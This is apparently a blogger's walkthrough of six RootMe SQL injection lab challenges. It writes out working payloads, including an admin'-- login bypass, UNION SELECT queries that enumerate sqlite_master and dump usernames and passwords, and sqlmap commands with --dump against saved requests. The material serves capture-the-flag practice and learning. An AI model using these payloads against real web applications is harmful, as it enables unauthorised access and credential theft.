RootMe - SQL Injection Challenges
RootMe challenge walkthroughs - SQL Injection Authentication, String, Numeric, Error, Time Based, Blind
RootMe – SQL Injection Challenges (Web-Client)
Just solved a bunch of SQL injection challenges on RootMe. These are all about finding injection points in web apps, using manual queries or sqlmap to dump credentials. Here’s my quick notes for each one.
1. SQL injection - Authentication
Mission
1)Retrieve the administrator password
Analysis
1)basic login page with two input field username and password. Solution steps
1) trying to inject with ‘ in username input and i got this error : 
2) that mean sql injection is here . 3)inject user name with admin'-- and i got it : 
4)inspect page and got the password : 
Finished..Happy Hacking..!
2. SQL injection - String
Mission
1)Retrieve the administrator password
Solution steps
1) open challenge and i find 3 tabs home , search , login 2) start with search and inject it by '-- 3) i got some information : 
4) i used union and it’s success . 5) trying to know number or columns with 'union select null;-- and it’s got and error : 
6) try union select null,null;-- and it’s success : 
7) i try to know tables union SELECT tbl_name ,null FROM sqlite_master WHERE type='table'--" and tables is users ,new; 
8) dump columns name with SELECT null,sql FROM sqlite_master WHERE type!=’meta’ AND sql NOT NULL AND name =’users’
9) now get username and passwords with simple query 'union select username,password from users-- 
Finished..Happy Hacking..!
3. SQL injection - Numeric
Mission
1)Retrieve the administrator password.
analysis
1) the challenge has a login form and some tabs 2) i open burp to record all traffic and open all tabs to see if we had a parameters don’t appear in page : 
3) i find a param id that’s and when i inject it with ‘ i find a sqlite error and this is the point .
Solution steps
1) this is union based sqli and when i change id to 3+union+select+1,2,3– 2 and 3 appear in page : 
2) trying to know database structure union SELECT 1,sql,3 FROM sqlite_master and i find table name is users and columns is username and password : 
3)get admin password with query union select 1,username,password from users-- : 
sql map can do it faster put i need to practice queries .
Finished..Happy Hacking..!
From this challenge i will use sqlmap
4. SQL injection - Error
Mission
1)Retrieve the administrator password.
analysis
1) the challenge has a login form and some tabs 2) i open burp to record all traffic and open all tabs to see if we had a parameters don’t appear in page : 
solution
1) send request to repeater and add * after asc and save request in fille r.txt : 
2) using sqlmap :
python3 sqlmap.py -r ../Documents/r.txt –dump –batch
3) find admin password: 
Finished..Happy Hacking..!
5. SQL injection - Time based
Mission
1)Retrieve the administrator password.
analysis
1) the challenge has a login form and some tabs 2) i open burp to record all traffic and open all tabs to see if we had a parameters don’t appear in page
solution
1)after enum application i find member parameter mark with * to make it easy to sqlmap : 
2)save request to r.txt and run sqlmap:
python3 sqlmap.py -r ../Documents/r.txt –dump –batch –time-sec 10
3)after 15 minutes sqlmap find all credential : 
Finished..Happy Hacking..!
6.SQL injection - Blind
Mission
1)Retrieve the administrator password. analysis
1)1) the challenge has a login form two inputs username and password . 2) i test admin'-- and i get into the appliction ??? : 
3) i don’t know how that easy but we still need to get password solution
1) after test the injection point username i copy request to r.txt and start sqlmap : 
| >python3 sqlmap.py -r ../Documents/r.txt –dump –batch –time-sec 10 |
finding : 
Finished..Happy Hacking..! Follow me: